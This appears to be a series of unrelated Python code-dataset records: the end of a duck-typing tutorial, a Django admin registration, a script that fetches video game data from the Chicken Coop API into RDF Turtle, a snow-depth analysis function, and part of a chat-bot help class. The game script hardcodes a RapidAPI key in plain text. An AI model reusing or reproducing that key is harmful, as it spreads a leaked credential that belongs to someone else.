TypeError: Unsubscriptable object..\n# This means you can create your own classes that have their own internal data structures - but are accessed using normal Python syntax. This is awfully convenient.\n\n# isinstance(object, dict) returns True if object is a dictionary - or an instance of a subclass of dict.\n# Instead of:\n#\n# if isinstance(object, dict):\n# value = object[member]\n#\n# it is considered more pythonic to do :\n#\n# try:\n# value = object[member]\n# except TypeError:\n# # do something else\n#\n# Our example above could become :\n#\n# if hasattr(object, 'keys'):\n# value = object[member]\n#\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
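
The duck-typing article above closes on the point that any class defining its own __getitem__ is indexable with normal square-bracket syntax. A small sketch of that point; the Config class is made up for illustration:

# Any class that defines __getitem__ can be indexed like a dict -
# Python only checks that the method exists, not the object's type.
class Config(object):
    def __init__(self, pairs):
        self._pairs = dict(pairs)  # hypothetical internal data structure

    def __getitem__(self, member):
        return self._pairs[member]

conf = Config({'host': 'localhost'})
print(conf['host'])  # -> localhost, dispatched to Config.__getitem__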
from django.contrib import admin
from pharma_models.personas.models import Persona

admin.site.register(Persona)
normal
{ "blob_id": "59d04ebd9a45c6a179a2da1f88f728ba2af91c05", "index": 590, "step-1": "<mask token>\n", "step-2": "<mask token>\nadmin.site.register(Persona)\n", "step-3": "from django.contrib import admin\nfrom pharma_models.personas.models import Persona\nadmin.site.register(Persona)\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
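
Since Django 1.7 the same registration can be written with the admin.register decorator; a sketch with a hypothetical list_display:

from django.contrib import admin
from pharma_models.personas.models import Persona

@admin.register(Persona)
class PersonaAdmin(admin.ModelAdmin):
    list_display = ('id',)  # 'id' exists on any default model; other field names would be assumptions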
import requests
import json
from termcolor import cprint
from pathlib import Path
import os


def console_check(csl, f):
    if csl == 'playstation-4':
        f.write('\tdbo:computingPlatform dbpedia:PlayStation_4.')
    if csl == 'playstation-3':
        f.write('\tdbo:computingPlatform dbpedia:PlayStation_3.')
    if csl == 'playstation-2':
        f.write('\tdbo:computingPlatform dbpedia:PlayStation_2.')
    if csl == 'playstation':
        f.write('\tdbo:computingPlatform dbpedia:PlayStation.')
    if csl == 'xbox-one':
        f.write('\tdbo:computingPlatform dbpedia:Xbox_One.')
    if csl == 'xbox-360':
        f.write('\tdbo:computingPlatform dbpedia:Xbox_360.')
    if csl == 'switch':
        f.write('\tdbo:computingPlatform dbpedia:Nintendo_Switch.')
    if csl == 'pc':
        f.write('\tdbo:computingPlatform dbpedia:Computer.')
    f.write('\n\n')


def initial_warnings():
    cprint("Esse programa funciona usando uma API chamada Chicken Coop API.", "red", attrs=['bold'])
    cprint("Essa API pega informações sobre jogos de determinados consoles.", "red", attrs=['bold'])
    cprint("Para que ela rode corretamente, siga as seguintes instruções:", "cyan", attrs=['bold'])
    cprint("Consoles:", 'yellow', attrs=['bold'])
    cprint("  Playstation 4 -> playstation-4", "green", attrs=['bold'])
    cprint("  Xbox One -> xbox-one", "green", attrs=['bold'])
    cprint("  Computador -> pc", "green", attrs=['bold'])
    cprint("  Nintendo Switch -> switch", "green", attrs=['bold'])
    cprint("Exemplos de jogos: ", 'yellow', attrs=['bold'])
    cprint("  Uncharted: The Lost Legacy", "green", attrs=['bold'])
    cprint("  God of War", "green", attrs=['bold'])
    cprint("  Ori and The Blind Forest", "green", attrs=['bold'])
    cprint("Aviso: Os jogos devem ser escritos com o nome exato e os consoles da maneira demonstrada,"
           " caso contrário, não funcionará!", 'magenta', attrs=['bold'])
    print("\n")


def get_and_write(mc, csl):
    print(f"Title: {mc['result']['title']}")
    print(f"Release Date: {mc['result']['releaseDate']}")
    # print(f"Description: {mc['result']['description']}")
    print(f"Score: {mc['result']['score']}")
    # print(f"Rating: {mc['result']['rating']}")
    print(f"Developer: {mc['result']['developer']}\n")

    mc_title = mc['result']['title']
    # mc_description = mc['result']['description']
    mc_score = mc['result']['score']
    mc_developer = mc['result']['developer']

    rsp = write_file(mc_title, mc_score, mc_developer, mc, csl)
    if rsp:
        write_file(mc_title, mc_score, mc_developer, mc, csl)


def write_file(title, score, developer, mc, csl):
    source = "<https://www.metacritic.com/game/"
    aux_title = ''
    source = source + csl + '/'
    path = Path('gamedeflib_rdf.ttl')
    if path.is_file() and os.stat('gamedeflib_rdf.ttl').st_size > 0:
        file = open('gamedeflib_rdf.ttl', 'r')
        count = 1
        for element in file:
            jogo = f'_:game{count}\n'
            if element == jogo:
                count = count + 1
        file.close()
        file = open('gamedeflib_rdf.ttl', 'a+')
        file.write(f'\n_:game{count}\n')
        file.write(f'\trdfs:label "{title}";\n')
        file.write(f'\tdbp:score {score};\n')
        genre_number(mc, file)
        publisher_number(mc, file)
        file.write(f'\tdbo:developer "{developer}";\n')
        aux_title = title.lower()
        aux_title = aux_title.replace(":", "")
        aux_title = aux_title.replace(" ", "-")
        source = source + aux_title + ">"
        file.write(f'\tdc:source {source};\n')
        console_check(csl, file)
        file.close()
    else:
        file = open('gamedeflib_rdf.ttl', 'w+')
        file.write("@prefix dc: <http://purl.org/dc/elements/1.1/> .\n")
        file.write("@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .\n")
        file.write("@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .\n")
        file.write("@prefix foaf: <http://xmlns.com/foaf/0.1/> .\n")
        file.write("@prefix dbo: <http://dbpedia.org/ontology/> .\n")
        file.write("@prefix dbpedia: <http://dbpedia.org/page/> .\n")
        file.write("@prefix dbp: <http://dbpedia.org/property/> .\n")
        file.write('dbpedia:PlayStation_4\n'
                   '\tfoaf:name "PlayStation 4";\n'
                   '\tdbo:type dbpedia:Home_video_game_console;\n'
                   '\trdfs:label "PlayStation 4".\n\n')
        file.write('dbpedia:PlayStation_3\n'
                   '\tdbo:type dbpedia:Home_video_game_console;\n'
                   '\trdfs:label "PlayStation 3".\n\n')
        file.write('dbpedia:PlayStation_2\n'
                   '\tdbo:type dbpedia:Home_video_game_console;\n'
                   '\trdfs:label "PlayStation 2".\n\n')
        file.write('dbpedia:PlayStation\n'
                   '\tdbp:type dbpedia:Video_game_console;\n'
                   '\trdfs:label "PlayStation".\n\n')
        file.write('dbpedia:XBox_One\n'
                   '\tfoaf:name "XBox One";\n'
                   '\tdbo:type dbpedia:Home_video_game_console;\n'
                   '\trdfs:label "XBox One" .\n\n')
        file.write('dbpedia:XBox_360\n'
                   '\tdbo:type dbpedia:Home_video_game_console;\n'
                   '\trdfs:label "XBox 360" .\n\n')
        file.write('dbpedia:Nintendo_Switch\n'
                   '\tfoaf:name "New Nintendank New Wii U 2.0+";\n'
                   '\tdbo:type dbpedia:Video_game_hardware;\n'
                   '\trdfs:label "Nintendo Switch" .\n\n')
        file.write('dbpedia:Computer\n'
                   '\tdbp:title "Computer";\n'
                   '\trdf:type dbo:Device;\n'
                   '\trdfs:label "Computer" .\n\n')
        return 1


def genre_number(mc, f):
    tam = len(mc['result']['genre'])
    for x in range(0, tam):
        print(f"Genre number {x+1}: {mc['result']['genre'][x]}")
        aux = mc['result']['genre'][x]
        f.write(f'\tdbo:genre "{aux}";\n')


def publisher_number(mc, f):
    tam = len(mc['result']['publisher'])
    for x in range(0, tam):
        print(f"Publisher number {x + 1}: {mc['result']['publisher'][x]}")
        aux = mc['result']['publisher'][x]
        f.write(f'\tdbo:publisher "{aux}";\n')


def main():
    print('Digite o console do jogo desejado: ', end='')
    console = str(input())
    print('Digite o título do jogo desejado: ', end='')
    title = str(input())

    try:
        url = "https://chicken-coop.p.rapidapi.com/games/" + title
        querystring = {"platform": console}
        headers = {
            'x-rapidapi-host': "chicken-coop.p.rapidapi.com",
            'x-rapidapi-key': "c3df04dcc0msh2d6e3cc8ccd93dep1c9851jsn230c81227b26"
        }
        response = requests.request("GET", url, headers=headers, params=querystring)
        metacritic = json.loads(response.text)
        if metacritic['result'] == 'No result':
            print("\nAlguma informação digitada está incorreta. Tente novamente.")
        else:
            get_and_write(metacritic, console)
    except Exception as err:
        print("Algum erro desconhecido ocorreu durante a execução.\nTente novamente.")
        cprint(err, 'red')


initial_warnings()
main()
while True:
    print('Gostaria de adicionar outro jogo na base RDF: (1 - Sim/0 - Não): ', end='')
    try:
        ans = int(input())
        if ans == 1:
            main()
        elif ans == 0:
            print('Encerrando o script')
            break
        else:
            print('Valor digitado deve ser 0 ou 1.')
    except ValueError as e:
        print('Valor foi inserido incorretamente. Tente de novo.')
        cprint(e, 'red')
normal
{ "blob_id": "b290763362af96f5af03fa31f4936339cef66a1d", "index": 2062, "step-1": "<mask token>\n\n\ndef console_check(csl, f):\n if csl == 'playstation-4':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_4.')\n if csl == 'playstation-3':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_3.')\n if csl == 'playstation-2':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_2.')\n if csl == 'playstation':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation.')\n if csl == 'xbox-one':\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_One.')\n if csl == 'xbox-360':\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_360.')\n if csl == 'switch':\n f.write('\\tdbo:computingPlatform dbpedia:Nintendo_Switch.')\n if csl == 'pc':\n f.write('\\tdbo:computingPlatform dbpedia:Computer.')\n f.write('\\n\\n')\n\n\ndef initial_warnings():\n cprint('Esse programa funciona usando uma API chamada Chicken Coop API.',\n 'red', attrs=['bold'])\n cprint('Essa API pega informações sobre jogos de determinados consoles.',\n 'red', attrs=['bold'])\n cprint('Para que ela rode corretamente, siga as seguintes instruções:',\n 'cyan', attrs=['bold'])\n cprint('Consoles:', 'yellow', attrs=['bold'])\n cprint(' Playstation 4 -> playstation-4', 'green', attrs=['bold'])\n cprint(' Xbox One -> xbox-one', 'green', attrs=['bold'])\n cprint(' Computador -> pc', 'green', attrs=['bold'])\n cprint(' Nintendo Switch -> switch', 'green', attrs=['bold'])\n cprint('Exemplos de jogos: ', 'yellow', attrs=['bold'])\n cprint(' Uncharted: The Lost Legacy', 'green', attrs=['bold'])\n cprint(' God of War', 'green', attrs=['bold'])\n cprint(' Ori and The Blind Forest', 'green', attrs=['bold'])\n cprint(\n 'Aviso: Os jogos devem ser escritos com o nome exato e os consoles da maneira demonstrada, caso contrário, não funcionará!'\n , 'magenta', attrs=['bold'])\n print('\\n')\n\n\ndef get_and_write(mc, csl):\n print(f\"Title: {mc['result']['title']}\")\n print(f\"Release Date: {mc['result']['releaseDate']}\")\n print(f\"Score: {mc['result']['score']}\")\n print(f\"Developer: {mc['result']['developer']}\\n\")\n mc_title = mc['result']['title']\n mc_score = mc['result']['score']\n mc_developer = mc['result']['developer']\n rsp = write_file(mc_title, mc_score, mc_developer, mc, csl)\n if rsp:\n write_file(mc_title, mc_score, mc_developer, mc, csl)\n\n\ndef write_file(title, score, developer, mc, csl):\n source = '<https://www.metacritic.com/game/'\n aux_title = ''\n source = source + csl + '/'\n path = Path('gamedeflib_rdf.ttl')\n if path.is_file() and os.stat('gamedeflib_rdf.ttl').st_size > 0:\n file = open('gamedeflib_rdf.ttl', 'r')\n count = 1\n for element in file:\n jogo = f'_:game{count}\\n'\n if element == jogo:\n count = count + 1\n file.close()\n file = open('gamedeflib_rdf.ttl', 'a+')\n file.write(f'\\n_:game{count}\\n')\n file.write(f'\\trdfs:label \"{title}\";\\n')\n file.write(f'\\tdbp:score {score};\\n')\n genre_number(mc, file)\n publisher_number(mc, file)\n file.write(f'\\tdbo:developer \"{developer}\";\\n')\n aux_title = title.lower()\n aux_title = aux_title.replace(':', '')\n aux_title = aux_title.replace(' ', '-')\n source = source + aux_title + '>'\n file.write(f'\\tdc:source {source};\\n')\n console_check(csl, file)\n file.close()\n else:\n file = open('gamedeflib_rdf.ttl', 'w+')\n file.write('@prefix dc: \\t<http://purl.org/dc/elements/1.1/> .\\n')\n file.write(\n '@prefix rdf:\\t<http://www.w3.org/1999/02/22-rdf-syntax-ns#> .\\n')\n file.write('@prefix rdfs:\\t<http://www.w3.org/2000/01/rdf-schema#> .\\n'\n )\n 
file.write('@prefix foaf:\\t<http://xmlns.com/foaf/0.1/> .\\n')\n file.write('@prefix dbo: <http://dbpedia.org/ontology/> .\\n')\n file.write('@prefix dbpedia: <http://dbpedia.org/page/> .\\n')\n file.write('@prefix dbp: <http://dbpedia.org/property/> .\\n')\n file.write(\n \"\"\"dbpedia:PlayStation_4\n\tfoaf:name \"PlayStation 4\";\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 4\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation_3\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 3\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation_2\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 2\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation\n\tdbp:type dbpedia:Video_game_console;\n\trdfs:label \"PlayStation\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:XBox_One\n\tfoaf:name \"XBox One\";\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"XBox One\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:XBox_360\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"XBox 360\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:Nintendo_Switch\n\tfoaf:name \"New Nintendank New Wii U 2.0+\";\n\tdbo:type dbpedia:Video_game_hardware;\n\trdfs:label \"Nintendo Switch\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:Computer\n\tdbp:title \"Computer\";\n\trdf:type dbo:Device;\n\trdfs:label \"Computer\" .\n\n\"\"\"\n )\n return 1\n\n\ndef genre_number(mc, f):\n tam = len(mc['result']['genre'])\n for x in range(0, tam):\n print(f\"Genre number {x + 1}: {mc['result']['genre'][x]}\")\n aux = mc['result']['genre'][x]\n f.write(f'\\tdbo:genre \"{aux}\";\\n')\n\n\ndef publisher_number(mc, f):\n tam = len(mc['result']['publisher'])\n for x in range(0, tam):\n print(f\"Publisher number {x + 1}: {mc['result']['publisher'][x]}\")\n aux = mc['result']['publisher'][x]\n f.write(f'\\tdbo:publisher \"{aux}\";\\n')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef console_check(csl, f):\n if csl == 'playstation-4':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_4.')\n if csl == 'playstation-3':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_3.')\n if csl == 'playstation-2':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_2.')\n if csl == 'playstation':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation.')\n if csl == 'xbox-one':\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_One.')\n if csl == 'xbox-360':\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_360.')\n if csl == 'switch':\n f.write('\\tdbo:computingPlatform dbpedia:Nintendo_Switch.')\n if csl == 'pc':\n f.write('\\tdbo:computingPlatform dbpedia:Computer.')\n f.write('\\n\\n')\n\n\ndef initial_warnings():\n cprint('Esse programa funciona usando uma API chamada Chicken Coop API.',\n 'red', attrs=['bold'])\n cprint('Essa API pega informações sobre jogos de determinados consoles.',\n 'red', attrs=['bold'])\n cprint('Para que ela rode corretamente, siga as seguintes instruções:',\n 'cyan', attrs=['bold'])\n cprint('Consoles:', 'yellow', attrs=['bold'])\n cprint(' Playstation 4 -> playstation-4', 'green', attrs=['bold'])\n cprint(' Xbox One -> xbox-one', 'green', attrs=['bold'])\n cprint(' Computador -> pc', 'green', attrs=['bold'])\n cprint(' Nintendo Switch -> switch', 'green', attrs=['bold'])\n cprint('Exemplos de jogos: ', 'yellow', attrs=['bold'])\n cprint(' Uncharted: The Lost Legacy', 'green', attrs=['bold'])\n cprint(' God of War', 'green', attrs=['bold'])\n cprint(' Ori and The Blind Forest', 'green', attrs=['bold'])\n 
import requests
import json
from termcolor import cprint
from pathlib import Path
import os


def console_check(csl, f):
    # link the game to the matching console node defined in the file header
    if csl == 'playstation-4':
        f.write('\tdbo:computingPlatform dbpedia:PlayStation_4.')
    elif csl == 'playstation-3':
        f.write('\tdbo:computingPlatform dbpedia:PlayStation_3.')
    elif csl == 'playstation-2':
        f.write('\tdbo:computingPlatform dbpedia:PlayStation_2.')
    elif csl == 'playstation':
        f.write('\tdbo:computingPlatform dbpedia:PlayStation.')
    elif csl == 'xbox-one':
        f.write('\tdbo:computingPlatform dbpedia:Xbox_One.')
    elif csl == 'xbox-360':
        f.write('\tdbo:computingPlatform dbpedia:Xbox_360.')
    elif csl == 'switch':
        f.write('\tdbo:computingPlatform dbpedia:Nintendo_Switch.')
    elif csl == 'pc':
        f.write('\tdbo:computingPlatform dbpedia:Computer.')
    f.write('\n\n')


def initial_warnings():
    cprint("This program works using an API called Chicken Coop API.", "red", attrs=['bold'])
    cprint("The API fetches information about games on specific consoles.", "red", attrs=['bold'])
    cprint("For it to run correctly, follow these instructions:", "cyan", attrs=['bold'])
    cprint("Consoles:", 'yellow', attrs=['bold'])
    cprint("    Playstation 4   -> playstation-4", "green", attrs=['bold'])
    cprint("    Xbox One        -> xbox-one", "green", attrs=['bold'])
    cprint("    Computer        -> pc", "green", attrs=['bold'])
    cprint("    Nintendo Switch -> switch", "green", attrs=['bold'])
    cprint("Example games:", 'yellow', attrs=['bold'])
    cprint("    Uncharted: The Lost Legacy", "green", attrs=['bold'])
    cprint("    God of War", "green", attrs=['bold'])
    cprint("    Ori and The Blind Forest", "green", attrs=['bold'])
    cprint("Warning: games must be typed with their exact name and the consoles exactly as shown,"
           " otherwise the lookup will not work!", 'magenta', attrs=['bold'])
    print("\n")


def get_and_write(mc, csl):
    print(f"Title: {mc['result']['title']}")
    print(f"Release Date: {mc['result']['releaseDate']}")
    # print(f"Description: {mc['result']['description']}")
    print(f"Score: {mc['result']['score']}")
    # print(f"Rating: {mc['result']['rating']}")
    print(f"Developer: {mc['result']['developer']}\n")
    mc_title = mc['result']['title']
    mc_score = mc['result']['score']
    mc_developer = mc['result']['developer']
    # write_file returns 1 only when it had to create the file and write the
    # prefix header, in which case a second call appends the game itself
    rsp = write_file(mc_title, mc_score, mc_developer, mc, csl)
    if rsp:
        write_file(mc_title, mc_score, mc_developer, mc, csl)


def write_file(title, score, developer, mc, csl):
    source = '<https://www.metacritic.com/game/'
    source = source + csl + '/'
    path = Path('gamedeflib_rdf.ttl')
    if path.is_file() and os.stat('gamedeflib_rdf.ttl').st_size > 0:
        # find the next free blank-node id by counting existing game entries
        file = open('gamedeflib_rdf.ttl', 'r')
        count = 1
        for element in file:
            jogo = f'_:game{count}\n'
            if element == jogo:
                count = count + 1
        file.close()
        file = open('gamedeflib_rdf.ttl', 'a+')
        file.write(f'\n_:game{count}\n')
        file.write(f'\trdfs:label "{title}";\n')
        file.write(f'\tdbp:score {score};\n')
        genre_number(mc, file)
        publisher_number(mc, file)
        file.write(f'\tdbo:developer "{developer}";\n')
        aux_title = title.lower()
        aux_title = aux_title.replace(':', '')
        aux_title = aux_title.replace(' ', '-')
        source = source + aux_title + '>'
        file.write(f'\tdc:source {source};\n')
        console_check(csl, file)
        file.close()
        # the game has been written; signal the caller that no retry is needed
        return 0
    else:
        # first run: create the file with the prefix header and the static
        # console nodes, then signal the caller to call again for the game
        file = open('gamedeflib_rdf.ttl', 'w+')
        file.write('@prefix dc: \t<http://purl.org/dc/elements/1.1/> .\n')
        file.write('@prefix rdf:\t<http://www.w3.org/1999/02/22-rdf-syntax-ns#> .\n')
        file.write('@prefix rdfs:\t<http://www.w3.org/2000/01/rdf-schema#> .\n')
        file.write('@prefix foaf:\t<http://xmlns.com/foaf/0.1/> .\n')
        file.write('@prefix dbo: <http://dbpedia.org/ontology/> .\n')
        file.write('@prefix dbpedia: <http://dbpedia.org/page/> .\n')
        file.write('@prefix dbp: <http://dbpedia.org/property/> .\n')
        file.write('dbpedia:PlayStation_4\n'
                   '\tfoaf:name "PlayStation 4";\n'
                   '\tdbo:type dbpedia:Home_video_game_console;\n'
                   '\trdfs:label "PlayStation 4".\n\n')
        file.write('dbpedia:PlayStation_3\n'
                   '\tdbo:type dbpedia:Home_video_game_console;\n'
                   '\trdfs:label "PlayStation 3".\n\n')
        file.write('dbpedia:PlayStation_2\n'
                   '\tdbo:type dbpedia:Home_video_game_console;\n'
                   '\trdfs:label "PlayStation 2".\n\n')
        file.write('dbpedia:PlayStation\n'
                   '\tdbp:type dbpedia:Video_game_console;\n'
                   '\trdfs:label "PlayStation".\n\n')
        file.write('dbpedia:Xbox_One\n'
                   '\tfoaf:name "Xbox One";\n'
                   '\tdbo:type dbpedia:Home_video_game_console;\n'
                   '\trdfs:label "Xbox One" .\n\n')
        file.write('dbpedia:Xbox_360\n'
                   '\tdbo:type dbpedia:Home_video_game_console;\n'
                   '\trdfs:label "Xbox 360" .\n\n')
        file.write('dbpedia:Nintendo_Switch\n'
                   '\tfoaf:name "New Nintendank New Wii U 2.0+";\n'
                   '\tdbo:type dbpedia:Video_game_hardware;\n'
                   '\trdfs:label "Nintendo Switch" .\n\n')
        file.write('dbpedia:Computer\n'
                   '\tdbp:title "Computer";\n'
                   '\trdf:type dbo:Device;\n'
                   '\trdfs:label "Computer" .\n\n')
        file.close()
        return 1


def genre_number(mc, f):
    tam = len(mc['result']['genre'])
    for x in range(0, tam):
        print(f"Genre number {x + 1}: {mc['result']['genre'][x]}")
        aux = mc['result']['genre'][x]
        f.write(f'\tdbo:genre "{aux}";\n')


def publisher_number(mc, f):
    tam = len(mc['result']['publisher'])
    for x in range(0, tam):
        print(f"Publisher number {x + 1}: {mc['result']['publisher'][x]}")
        aux = mc['result']['publisher'][x]
        f.write(f'\tdbo:publisher "{aux}";\n')


def main():
    print('Enter the console of the desired game: ', end='')
    console = str(input())
    print('Enter the title of the desired game: ', end='')
    title = str(input())
    try:
        url = 'https://chicken-coop.p.rapidapi.com/games/' + title
        querystring = {'platform': console}
        headers = {'x-rapidapi-host': 'chicken-coop.p.rapidapi.com',
                   'x-rapidapi-key': 'c3df04dcc0msh2d6e3cc8ccd93dep1c9851jsn230c81227b26'}
        response = requests.request('GET', url, headers=headers, params=querystring)
        metacritic = json.loads(response.text)
        if metacritic['result'] == 'No result':
            print('\nSome of the entered information is incorrect. Please try again.')
        else:
            get_and_write(metacritic, console)
    except Exception as err:
        print('An unknown error occurred during execution.\nPlease try again.')
        cprint(err, 'red')


initial_warnings()
main()
while True:
    print('Would you like to add another game to the RDF base? (1 - Yes / 0 - No): ', end='')
    try:
        ans = int(input())
        if ans == 1:
            main()
        elif ans == 0:
            print('Shutting down the script')
            break
        else:
            print('The entered value must be 0 or 1.')
    except ValueError as e:
        print('The value was entered incorrectly. Please try again.')
        cprint(e, 'red')
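# For reference, one appended record in gamedeflib_rdf.ttl is expected to look
# roughly like the sketch below. The genres, publishers, and score depend on
# the API response, so the values here are made up:
#
#   _:game1
#   	rdfs:label "God of War";
#   	dbp:score 94;
#   	dbo:genre "Action Adventure";
#   	dbo:publisher "Sony Interactive Entertainment";
#   	dbo:developer "SCE Santa Monica";
#   	dc:source <https://www.metacritic.com/game/playstation-4/god-of-war>;
#   	dbo:computingPlatform dbpedia:PlayStation_4.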
# import necessary modules
import cv2
import xlsxwriter
import statistics
from matplotlib import pyplot as plt
import math
import tqdm
import numpy as np
import datetime

def getDepths(imgs, img_names, intersectionCoords, stakeValidity, templateIntersections,
    upperBorder, tensors, actualTensors, intersectionDist, blobDistTemplate, debug, debug_directory,
    image_dates, imageSummary):
    """
    Function to calculate the change in snow depth for each stake using the tensor
    from the specified template

    Keyword arguments:
    imgs -- list of input images
    img_names -- list of corresponding image file names
    intersectionCoords -- list containing intersection coordinates for input images
    stakeValidity -- list indicating which stakes in input images are valid
    templateIntersections -- list containing intersection coordinates for template
    upperBorder -- upper crop parameter
    tensors -- tensors from template image
    actualTensors -- tensors calculated for input images
    intersectionDist -- list containing distances from blobs to intersection points
        for input images
    blobDistTemplate -- list containing blob to intersection point distances from
        template
    debug -- bool flag indicating whether output images should be saved
    debug_directory -- directory where output images should be written
    image_dates -- list containing dates of images extracted from EXIF data
    imageSummary -- dictionary containing information about each run
    """

    # list containing median depths for each image
    median_depths = list()
    median_depths_est = list()

    # contains output data for JSON file
    depth_output = {}

    # num of images
    num_images = len(imgs)

    # create output dictionary for images
    depths = dict()

    # create excel workbook and add worksheet
    dest = str(debug_directory) + 'snow-depths.xlsx'
    workbook = xlsxwriter.Workbook(dest)
    worksheet = workbook.add_worksheet()
    worksheet.set_column(0, len(tensors) + 3, 25)

    # create format
    cell_format = workbook.add_format()
    cell_format.set_align('center')

    # add titles
    worksheet.write(0, 0, "Image", cell_format)
    worksheet.write(0, 1, "Date", cell_format)
    worksheet.write(0, len(tensors) + 2, "Median Depth (mm)", cell_format)
    worksheet.write(0, len(tensors) + 3, "Median Estimate (mm)", cell_format)
    for i, j in enumerate(tensors):
        worksheet.write(0, i+2, ("Stake %s" % str(i)), cell_format)

    # start from the first cell
    row = 1
    col = 0

    # image iterator
    iterator = 0

    # iterate through images
    for img_ in tqdm.tqdm(imgs):
        # create an image to overlay points on if debugging
        if(debug):
            img_overlay = img_.copy()

        # list to hold calculated depths
        depths_stake = list()
        estimate_stake = list()

        # get image name
        img_name = img_names[iterator]

        # reset column
        col = 0

        # write to excel file
        worksheet.write(row, col, img_name, cell_format)
        if isinstance(image_dates[iterator], datetime.datetime):
            worksheet.write(row, col + 1, image_dates[iterator].strftime('%x %X'), cell_format)
        col = 2

        # get intersection coordinates
        coords_stake = intersectionCoords[img_name]

        # get blob intersection distances
        intersection_dist_stake = intersectionDist[img_name]

        # iterate through stakes in image
        for i, stake in enumerate(coords_stake):
            # if stake is valid and intersection point was found
            if stakeValidity[img_name][i] and stake["average"][1] != False:
                # add reference circles to output image if debugging
                # shows intersection point of image with reference to template
                if(debug):
                    cv2.circle(img_overlay, (int(templateIntersections[i][0]), int(templateIntersections[i][1]) - upperBorder), 5, (255,0,0), 3)
                    cv2.circle(img_overlay, (int(stake["average"][0]),
int(stake["average"][1])), 5, (0,255,0), 2) # calculate change in snow depth in mm tensor = actualTensors[img_name][i] if actualTensors[img_name][i] != True else tensors[i] depth_change = ((templateIntersections[i][1] - upperBorder) - stake["average"][1]) * tensor # calculate change in snow depth using blob distances distances_stake = list() for w, x in enumerate(intersection_dist_stake[i]): if x != False: distances_stake.append((abs(blobDistTemplate[i][w]) - abs(x)) * tensor) distance_estimate = statistics.median(distances_stake) if len(distances_stake) > 0 else 0 # write to excel file worksheet.write(row, col + i, "%.2f (%.2f)" % (depth_change, distance_estimate), cell_format) # add to list depths_stake.append(depth_change) estimate_stake.append(distance_estimate) # if stake wasn't valid or intersection point not found else: # if stake was valid if stakeValidity[img_name][i]: worksheet.write(row, col + i, "Not Found", cell_format) # invalid stake else: worksheet.write(row, col + i, "Invalid Stake", cell_format) # append false to array depths_stake.append(False) estimate_stake.append(False) # output debug image if(debug): cv2.imwrite(debug_directory + img_name, img_overlay) # add list to dictionary depths[img_name] = depths_stake # determine median depth valid_depths = [x for x in depths_stake if x != False] valid_estimates = [x for x in estimate_stake if x != False] if(len(valid_depths) > 0): median = statistics.median(valid_depths) median_est = statistics.median(valid_estimates) else: median = False median_est = False # add to median depth list median_depths.append(median) median_depths_est.append(median_est) # write median to excel file if median != False and median > 0: worksheet.write(row, len(tensors) + 2, "%.2f" % median, cell_format) worksheet.write(row, len(tensors) + 3, "%.2f" % median_est, cell_format) elif median != False: worksheet.write(row, len(tensors) + 2, "0.0", cell_format) worksheet.write(row, len(tensors) + 3, "0.0", cell_format) else: worksheet.write(row, len(tensors) + 2, "n/a", cell_format) worksheet.write(row, len(tensors) + 3, "n/a", cell_format) # increment row row += 1 # increment iterator iterator += 1 # update image summary imageSummary[img_name][" "] = "" imageSummary[img_name]["Stake (Depth Calculation)"] = "Depth (mm) Estimate (mm)" for e, depth in enumerate(depths_stake): if isinstance(depth, float): imageSummary[img_name][" %d " % (e+1)] = "%0.2f %0.2f " % \ (depth, estimate_stake[e]) else: imageSummary[img_name][" %d " % (e+1)] = "%s %s " % \ ("n/a", "n/a") # close workbook workbook.close() # remove negative values filterSet = zip(median_depths, median_depths_est, image_dates) filterSet = [(x, y, z) for x, y, z in filterSet if x != False] median_depths, median_depths_est, image_dates = zip(*filterSet) median_depths = np.asarray(median_depths).clip(0) median_depths_est = np.asarray(median_depths_est).clip(0) # generate plot fig,ax = plt.subplots(1) plt.plot(image_dates, median_depths) plt.plot(image_dates, median_depths_est) plt.gcf().autofmt_xdate() plt.legend(['Median Depth', 'Median Estimate'], loc='upper left') ax.set_xlabel("Date") ax.set_ylabel("Snow Depth (mm)") plt.xticks(rotation=75) plt.tight_layout() # save figure plt.savefig(debug_directory + "depth-graph.jpg") plt.close() # return dictionary containing snow depth changes return depths, imageSummary
class Helper:
    def __init__(self):
        self.commands = ["help",
                         "lottery",
                         "poll",
                         "polling",
                         "prophecy",
                         "roll",
                         "team",
                         "ub"]
        self.commands_full = ["help [command]",
                              "lottery [seconds]",
                              "poll",
                              "polling [poll number]",
                              "prophecy",
                              "roll [number]",
                              "team [type]",
                              "ub [role]"]
        self.command_dict = {}
        self.init_command_info()

    # noinspection PyMethodMayBeStatic
    def display_help(self):
        result = "Help has been requested?\n\n" \
                 "__**Syntax to Summon Me**__\n" \
                 "Arise! [command] [options (optional)]\n\n" \
                 "__**Available Commands**__\n"
        for com in self.commands_full:
            result += f"{com}\n"

        result += "\nIf you want more info on a specific command, " \
                  "use the command \"help\" followed by a command of your choice. " \
